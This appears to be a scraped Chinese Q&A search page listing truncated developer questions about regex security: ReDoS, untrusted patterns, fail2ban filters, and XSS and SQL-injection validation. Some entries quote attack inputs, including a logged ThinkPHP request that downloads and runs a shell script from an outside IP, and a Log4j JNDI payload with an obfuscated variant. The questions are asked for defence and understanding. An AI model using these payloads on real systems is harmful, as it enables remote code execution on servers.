我正在使用HP工具来检测我的项目的漏洞,它提供了一些易受DOS攻击的代码。
while reading some regular expression through some '.properties' and then trying to create a pattern by Pattern.compile(regex);
不受信任的数据被传递给应用程序,并用作正则表达式。这会导致线程过度消耗CPU资源.
查询:现在用于解决方案,
如果我硬编码java文件本身中的正则表达式,那么它将不再是动态的。
我不确定是否应该对所读取的属性进行验证。
有人能建
浏览 4提问于2018-05-23得票数 2
2回答
使用用户的RegEx安全吗?
、、、、
我想添加一个功能到我的网站,让用户搜索文本与RegEx。但是,让用户这样做安全吗?
preg_match('/' . $user_input_regex . '/', $subject);
浏览 3提问于2014-07-19得票数 17
回答已采纳
我不确定这是否是正确的正则表达式,但我试图在
下面是我的ddos.conf中的配置行:
[Definition]
failregex = ^<HOST> -.*"(GET|POST).*
ignoreregex =.*(robots.txt|favicon.ico|jpg|png)
^<HOST> -.*"(GET|POST).*(Googlebot|bingbot)
代码是正确的吗?我应该添加什么来乘行?
浏览 0提问于2021-04-15得票数 0
1回答
我的服务器(mediaquarter.at)目前正被这样的请求(有一些小的变化):hXXp://www.mediaquarter.at/ DDoSed (“停用”,这样就不会有人不小心点击它)
如果你试图下载引用的PHP文件,请注意:在preg_replace中,/e开关是激活的,并且代码包含多个eval语句-在你想要查看它之前,请将其清理干净!看起来像pBot,你可以在这里找到更多信息:
TimThumb容易受到远程文件包含()的攻击--在WordPress中似乎相当普遍。因此,我可以理解有人调用hXXp://www.madeineurope.org.uk/media/functions/t
浏览 4提问于2011-12-14得票数 2
回答已采纳
我在解一个CTF。在阅读网页的源代码时,我发现了一段易受攻击的代码:
var r4c='(.*?)';
var results = location.hash.match('token\\('+r4c+'\\);');
我无法将'token\\('+r4c+'\\);'的任何字符串与我的任何输入相匹配。有人能帮我解决这个CTF吗?
浏览 0提问于2022-12-05得票数 0
回答已采纳
我一直在使用这个错误,我不知道为什么。任何帮助都会很棒。我在谷歌上搜索并找到了一些例子,但即使在其他人的例子中,我也会发现错误。
$statement = $list[$i];
echo $statement;
preg_match("/$statement/i", $q)
我也试过这两种方法:
$statement = '/' . $list[$i] . '/i';
echo $statement;
preg_match($statement, $q)
我得到的错误是:
警告: preg_match() function.preg-match
浏览 1提问于2013-07-03得票数 0
回答已采纳
只是为了确保:
std::basic_regex的构造函数必须检测无效的表达式,如果表达式不正确,则抛出异常。对吗?因此,假设我信任我的STL实现者,我可以向它传递仲裁字符串,我将得到一个有效的regex对象或一个异常-没有UB或类似的东西?
有没有人知道有buggy的std::basic_regex实现(EDIT:或regex库的其他部分)对错误输入没有健壮性?
浏览 2提问于2019-03-07得票数 3
例如,1.txt
a = "攻击力
非常高"
b = "防御力"
c = "防御力是#{example}"
d = "xyz"
我想要结果:
"攻击力
非常高"
"防御力"
"防御力是#{example}"
也没有"xyz",因为它不包含中文字符。
我测试了/(\p{Han}+)/,但它不是我想要的。
提前谢谢你。
下面是我的示例:
浏览 0提问于2013-01-12得票数 2
回答已采纳
我正在使用JavaScript中的regex验证日期,但是当我运行SonarQube进行代码分析时。它显示正则表达式是一个安全漏洞。
示例1:
下面是regex模式(链接到regex 的源代码):
^(?:(?:31(\/|-|\.)(?:0?[13578]|1[02]))\1|(?:(?:29|30)(\/|-|\.)(?:0?[13-9]|1[0-2])\2))(?:(?:1[6-9]|[2-9]\d)?\d{2})$|^(?:29(\/|-|\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)?(?:0[48]|[2468][048]|[13579][26])|(?:(?:1
浏览 1提问于2020-04-28得票数 10
回答已采纳
2回答
我在各种软件中寻找后门,想知道下面的代码是否容易受到sql注入的攻击。
有一个包含以下验证表达式的电子邮件字段。(ASPX/CS)
ValidationExpression="\w+([-+.']\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*">
是否有可能利用上面的代码来删除一个表,或者使用SQL注入做任何恶意的事情?
致谢问候
编辑1:人们问我这是如何实现的-
SqlConnection conn = new SqlConnection(snpConnectionString);
SqlCommand command = conn.Cre
浏览 1提问于2012-11-27得票数 0
回答已采纳
我有一个用python3编写的IRC机器人,它解析用户的搜索和替换请求。这样做是否有发生DoS或其他攻击的风险?
浏览 0提问于2016-01-29得票数 2
回答已采纳
以下内容如下:
我不太明白这里的意图(我的代码使用上述参考教程的一部分):
// XSS protection to avoid printing the value
/* Developer's Note: Not actually sure what the purpose of this is, or how it protects. */
$id = preg_replace("/[^a-zA-Z0-9_\-]+/", "", $id);
$uname = preg_replace("/[^a-zA-Z0-9_\-]+/", &#
浏览 2提问于2015-03-22得票数 0
回答已采纳
1回答
我有一个正则表达式作为对抗XSS的第一道防线。
public static function standard_text($str)
{
// pL matches letters
// pN matches numbers
// pZ matches whitespace
// pPc matches underscores
// pPd matches dashes
// pPo matches normal puncuation
return (bool) preg_match('/^[\pL\pN\pZ\p{Pc}\p{P
浏览 0提问于2010-09-20得票数 10
回答已采纳
我正在使用以下regexp进行XSS攻击验证。它正确地检查了<..> </>数据。但是当我开始输入单个字符时,它不允许输入任何单个字符(例如:如果我输入'a‘,它就不允许)。有人能在这方面帮我吗?
/^(|\/|[^\/>][^>]+|\/[^>][^>]+)$/
浏览 0提问于2018-05-12得票数 0
我正在尝试为我的服务器配置fail2ban,并在.config中看到了:apache-overflows
它能做什么[保护]什么?
浏览 0提问于2011-11-10得票数 6
回答已采纳
我只想让字符串/more,/next & /1出现在弹头之后:
这就是我所尝试的:
/([a-z0-9]+)([A-Za-z\-0-9]+)(.*)[/]{0,1}(more|next|[0-9]+){0,1}[/]{0,1}
当我像一样打开页面时,正则表达式仍然工作,我在正则表达式上使用了(.*)来允许任何字符出现在弹格上,这样它就会自动重定向。
浏览 8提问于2022-06-04得票数 -2
1回答
我用JavaScript学习正则表达式,这段代码似乎很慢。
/(a*a*)*b/.test("aaaaaaaaaaaaa")
对我来说,这似乎真的很简单,有人能给我解释一下为什么会发生这种情况吗?
浏览 1提问于2020-01-30得票数 1
在将正则表达式模式与fail2ban一起使用时遇到了问题。我们的服务器受到sqlmap渗透测试的影响,我希望能够在记录这些IP时禁止这些IP。从我看到的其他示例中,我似乎不必尝试匹配日志条目的每个部分,而只需搜索一个单词或字符串。只是看起来不能正确的处理模式。任何帮助都是非常感谢的。谢谢
当前过滤器:
# Fail2Ban configuration file
#
# Bans any scanning with the tool sqlmap.
#
[Definition]
# Option: failregex
# Notes.: Regexp to match the use of
浏览 2提问于2014-03-20得票数 1
这是否是一个好主意使用:
// input can only contain numbers letters
if (preg_match('/^[a-zA-Z0-9_\-\.]+$/', 'input')) {}
这将有助于防止SQL注入?并使站点更加安全吗?
浏览 3提问于2020-12-18得票数 1
回答已采纳
是否有一个html属性可以让我的模型的文本字段中的asp.net标签不受限制地进行验证?
就像这样
[NoHtmlHere]
public string MyTextField {get; set;}
浏览 2提问于2015-02-02得票数 0
我正在解析XML提要,其中包含带有html内容的描述标记,如下所示:
<DESCRIPTION>
<![CDATA[ <p style="text-align: justify;">Lahodná příchuť stvořená pro ochucování vlastních liquidů od italského potravinářského výrobce Flavour Art.</p> <p style="text-align: justify;">Dávkování příchuti do
浏览 3提问于2022-04-04得票数 -1
我正在开发一个网站,允许用户输入他们的内容模板如下:
Name: ${name}
Email: ${email}
Phone: ${phone_number}
...
它被存储在数据库中。当用户调用时,引擎将其取出,并将所有标志替换为适合的内容:
tpl = tpl.Replace("${name}", customer.Name);
tpl = tpl.Replace("${email}", customer.Email);
...
我对这种方式的性能感到困惑。如果我将一个模板转换成web用户控件(没有代码的ascx文件),并在用户调用时加载它,怎么样?我也担
浏览 1提问于2009-11-18得票数 0
1回答
我正在尝试将XHTML嵌入到XML节点中,如下所示:
<entry xmlns="http://www.w3.org/2005/Atom">
...
<content type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">
<p>some text</p>
</div>
</content>
...
</ent
浏览 3提问于2016-02-26得票数 1
1回答
最近已经广泛传播,因为基本的JNDI查找可以像简单一样容易。
${jndi:ldap://127.0.0.1:3089/}
但这不是一种常见的方法。我有一些黑客试图使用模式查找,就像
${${::-j}${::-n}${::-d}${::-i})
我想知道这份文件是以什么为基础的?我们怎么知道他们能注入什么其他模式呢?
浏览 12提问于2021-12-15得票数 0
1回答
我有一个关于规则id 942130 (https://github.com/fastly/waf_testbed/blob/master/templates/default/REQUEST-942-APPLICATION-ATTACK-SQLI.conf.erb)的问题。为什么在此模式中检查规则"only“x=x (x可以是任何字符)。只有当查询"or x=x“中有"or”时,攻击才能成功。出于这个原因,应该扩展模式,以便检查"or x= x“。我是不是忽略了什么? 例如:"FooH=HA",它被检测为sql注入,但不知道为什么。问题出在
浏览 29提问于2020-04-30得票数 0
我正在使用一个工程程序,它让我编码公式,以便过滤掉数据库中的特定行。我试图在数据库中查找某一行,其中包含例如“混凝土”作为属性。
在代码中,我可以使用正则表达式。
到目前为止,我使用的正则表达式如下所示:
".*(concrete).*";
因此,如果数据库中的行包含具体内容,我就会得到想要的结果。现在的问题是:我想用一个变量来交换单词concrete,这样它看起来就像这样:
".*(@VARIABLE1).*";
(程序btw中带有@ works的语法。)问题是:如果我将变量设置为具体变量,程序会自动将其切换为'concrete'。显然,具体这
浏览 0提问于2019-07-10得票数 0
1回答
假设我想让用户输入他想要的任何正则表达式和要匹配的字符串,我将使用Python的re.compile检查它是否匹配。安全吗?有没有办法让恶意用户通过传入巧尽心思构建的字符串来使其崩溃或远程执行?
浏览 1提问于2014-08-31得票数 7
1回答
var param=document.getElementById("test").value;
var url= "http://localhost/app/default.aspx?test="+param;
Window.showModalDialog(url);
showModalDialog方法行向我展示了加强开放重定向的问题。有没有什么办法可以在客户端解决这个问题(在javascript文件中)?
您的帮助将不胜感激。
浏览 10提问于2017-07-07得票数 0
需要注意的是,这个用户输入将通过regex (在PHP服务器端)进行验证和卫生,然后插入到数据库中。稍后将在同一网站(例如:在论坛上)向其他用户展示。
我指的是这样一种情况,即我事先知道用户的预期长度,而在这种情况下,我不知道,但我可以假设它不超过100个字符。
我试图找出检查用户输入长度是否有任何安全优势。
我知道这在语言和语言上不同,我使用的是PHP。有关任何其他语言(如Java、.NET、Python等)的信息都可以。
浏览 0提问于2019-12-03得票数 14
我正在学习Flow和react,当我导入一些模块时,flow找不到模块。
import axios from "axios"; //requied module not found
export const fetchPopularRepos = (lang: string) => {
var encodedURI = window.encodeURI( // flow not covered
"https://api.github.com/search/repositories?q=stars:>1 + language:
浏览 0提问于2017-06-21得票数 0
对于我的用户脚本的@include语句,Tamper猴子有一个不推荐的警告:
// @include /https\:\/\/([a-z\.]*\.)?(((stackexchange|askubuntu|superuser|serverfault|stackoverflow|stackapps)\.com)|(mathoverflow\.net))\/.*/
// @exclude /^https://(chat|api|data)\./
// @exclude https://stackexchange.com/*
eslint:用户脚本/更好地使用-匹配-使用@include可能不安全
浏览 29提问于2022-04-15得票数 2
回答已采纳
2回答
ReDos攻击下的安全正则化模式
、、、、
我最近遇到了一些攻击问题。
用简单步骤解释
Regex denial of services:这意味着攻击者可以放置一些恶意/精心编制的输入,从而使服务器无法停止查找正确的模式,从而占用整个CPU,并最终导致内部服务器错误。
例如,如果您有一个类似于^((ab)*)+$的模式,并且攻击者放置了像abababababababababababababababababa这样的恶意输入,这将导致灾难性的错误:
当使用Nested quantifiers时,问题会浮出水面,对一个子表达式进行量化,该子表达式本身可以在许多方面在相同的位置上匹配。如下图()所示:
对于许多模式匹配问题,有
浏览 4提问于2020-07-28得票数 4
我已经创建了一个后端使用asp.net 3.5和SQL Server2005的网站
我们已经创建了管理网站,用于使用安全用户帐户更新数据库中的数据。我为live工作了一段时间。
一段时间后,我们发现一些特定的html标记被插入到数据库的字符串域中。
看起来像是某种攻击
有没有人能建议我如何防止这种攻击。
浏览 0提问于2012-11-02得票数 1
无论我在JavaScript代码中使用Regex,SonarQube都会显示出漏洞问题。在JavaScript中是否有Regex的替代方案?
错误: Make sure that using a regular expression is safe here.
示例Regex : '(^(?=[A-Za-z0-9\._-]*$)(?=.*[A-Za-z0-9]).*$)'
浏览 20提问于2020-02-28得票数 6
回答已采纳
2回答
我们有一个非常旧的web服务器,上面有一些JSP页面,如下所示。我想我已经用白名单"a-zA-Z0-9*“检查了输入参数"version”。但是CheckMarx仍然收到XSS attach警告:“这种不可信的数据没有经过适当的杀毒或编码就被直接嵌入到输出中,使得攻击者能够将恶意代码插入到输出中。”您知道如何在JSP页面中正确执行此操作吗?它只是用来显示来自参数输入的内容。 <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="U
浏览 172提问于2021-02-01得票数 1
回答已采纳
我有一个文件app.log
Oct 06 03:51:43 test test
Nov 06 15:04:53 text text text
more text more text
Nov 06 15:06:43 text text text
Nov 06 15:07:33
more text more text
Nov 06 15:14:23 test test
more text more text
some more text
Nothing but text
some extra text
Nov 06 15:34:31 test test test
如何grep所有不是以Nov
浏览 0提问于2014-11-07得票数 6
回答已采纳
我在安全性方面的经验很少(仍在学习),但是我正在梳理我的日志,我注意到以下请求:
"GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0
浏览 0提问于2019-02-28得票数 36
回答已采纳
3回答
我得到了以下错误
[13-Sep-2011 07:26:28] PHP Warning: preg_match_all() [<a
href='function.preg-match-all'>function.preg-match-all</a>]: Unknown
modifier 'w' in D:\domains\wwwroot\php\search.php on line 274
search的值是"repair a pst“
$text1 = $result['ProgramName'] . &#
浏览 1提问于2011-09-15得票数 0
回答已采纳
3回答
我正在为Lua编写一个jFlex词汇,在设计一个正则表达式以匹配语言规范的一个特定部分时遇到了问题:
文本字符串也可以使用长括号括起来的长格式来定义。我们将n级的开口长括号定义为一个开口方括号,后面跟着n个等号,然后是另一个开口方括号。因此,0级的开头长括号被写为[[ ],第1级的开头长括号被写为[= ]等等。结束长括号的定义类似;例如,第4级的结束长括号被写为====]。长字符串以任何级别的开始长括号开始,并以同一级别的第一个结束长括号结束。这种括号中的文字可以运行几行,不解释任何转义序列,也可以忽略任何其他级别的长括号。它们可以包含任何东西,除了一个适当级别的结束括号。
简而言之,我正在
浏览 3提问于2009-06-21得票数 0
回答已采纳
在std::regex中使用用户定义的表达式是否安全(例如用于服务器端搜索)?标准库能保证破损表达式的安全吗?
浏览 1提问于2019-02-06得票数 5
回答已采纳
1回答
这听起来非常书呆子,但我玩这个网络游戏,把游戏中的事件写入一个日志文件。我正在使用一个程序,它可以读取这个日志文件,也可以解释regex。我的目标是编写regex命令,分析这个日志文件中的某个字符串,然后将字符串的某些部分显示到我的屏幕上。
写入日志文件的字符串具有以下语法(变量为粗体):
名称点击/攻击/碾压/爪子/任何新名称表示数字伤害点。
如果有关系,NUMBER将永远不会包含逗号或空格,而动作动词(hits、bashes等)只会是一个没有任何特殊字符、空格、数字等的单词。
我想要这个程序做的是解释我输入的regex代码,并给出一个结果:NAME攻击NEWNAME
问题是,N
浏览 0提问于2018-03-08得票数 1
2回答
几个小时以来,我一直试图获得由"{i}"和"{[i]}"分隔的字符串,例如在{i}Esse{[i]}中,i是一个整数。基于。我不知道发生了什么事,所以我决定寻求帮助。
我的代码是:
<?php
include "keepGetInBetweenStrings.php";
$x['city1']='Esse';
$x['city2']='';
$x['city3']='é';
$x['city4']='um bom exe
浏览 5提问于2014-01-27得票数 0
回答已采纳
4回答
jsp-窗体的字段验证
、、、、
我有一个jsp表单,字段名为Description。此字段声明如下
<input type="text" name="description">
此值用于组合SQL查询:
从描述'% (字段中的值)%‘的引擎中选择*
当用户输入字母数字字符时,它可以正常工作,但当用户输入特殊字符(如单引号:' )时,则会失败。
我的问题:
我如何在服务器端处理这个问题?
如果有必要在JavaScript上实现,那么需要过滤掉哪些字符?
谢谢。
浏览 9提问于2012-04-26得票数 0
目前在Vaadin 14.6.8中,EmailField接受这些值(例如"barney.@gmail.com“、".@gmail.com")作为有效输入。我是否应该将这些地址视为有效的EMail地址? EmailField emailField = new EmailField(); 已经在网上搜索过了,并且已经通过一些在线电子邮件地址验证器验证过了。
浏览 10提问于2021-09-01得票数 2
回答已采纳
我有一个字符串"(BETA) (2011年2月27日)“
我需要使用C#获得第二次出现的左括号和右括号
浏览 0提问于2011-03-22得票数 1
回答已采纳
我想从用户那里获取正则表达式,然后针对其他用户提交的输入运行它们,并显示输出。为了防止攻击,我需要牢记什么?
浏览 2提问于2013-12-17得票数 0
1回答
我正在使用的一个应用程序接口返回一个字符串,该字符串还可以包含一个带有链接的<a />标记。每当我在Pug中呈现它时,超链接呈现为纯文本并且不可点击。
有没有什么方法可以将文本中的链接转换为实际的链接?
示例字符串:Major disruption through Rugby. More details can be found in <A href="http://nationalrail.co.uk/service_disruptions/166412.aspx">Latest Travel News.</A>
浏览 19提问于2017-07-01得票数 0
回答已采纳
1回答
Web应用防火墙规则优化
、、、、
以下是取自ModSecurity核心规则的两条规则。这两个规则是XSS攻击的基本规则。如果我们查看这两条规则,它们的变量和操作是相同的,它们在正则表达式中的不同,即\bgetparent文件夹\b“和\bonmousedown\b\W*?\=”,并发现了大量这样的规则。这是多余的吗?我可以组合这些规则,即单个正则表达式吗?
REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/*“\bgetparent文件夹\b”阶段:2,rev:'2.2.4',SecRule,t:none,t:
浏览 0提问于2012-08-02得票数 1
回答已采纳
我在匹配和替换其中一个列值中的'-‘字符时出错。我有下面的PostgreSQL 11.0表。
a b
mp-6 mp 6
我使用下面的正则表达式来匹配两个列值。
regexp_replace(a, '\-', ' ', 'g') ~* ('\y'||regexp_replace(b, '\-', ' ', 'g')||'\y')
我收到以下错误:
[Code: 0, SQL State: 2201B] ERROR: invalid regula
浏览 87提问于2021-03-08得票数 0
2回答
正则表达式攻击向量?
、、、
在Ruby中,如何“参数化”输入到正则表达式的变量?例如,我正在执行以下操作:
q = params[:q]
all_values.collect { | col | [col.name] if col.name =~ /(\W|^)#{q}/i }.compact
因为它(#{q})是一个来自不可信来源(查询字符串)的变量,所以我不得不假设它可能是一个攻击向量。这里有什么最佳实践吗?
浏览 0提问于2009-12-24得票数 2
回答已采纳
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
腾讯云开发者
